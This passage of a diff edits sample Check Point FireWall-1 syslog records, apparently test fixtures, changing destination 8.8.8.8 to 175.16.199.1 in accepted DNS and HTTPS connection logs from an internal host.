FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34470"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44011"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54492"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.108.173.172"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34466"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46174"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46949"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57480"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52439"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33492"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43905"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51103"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57648"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33119"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55401"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46174"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46949"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57480"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52439"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33492"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43905"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51103"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57648"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33119"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55401"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52674"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34657"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] -<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46558"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37937"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34657"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46558"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37937"; 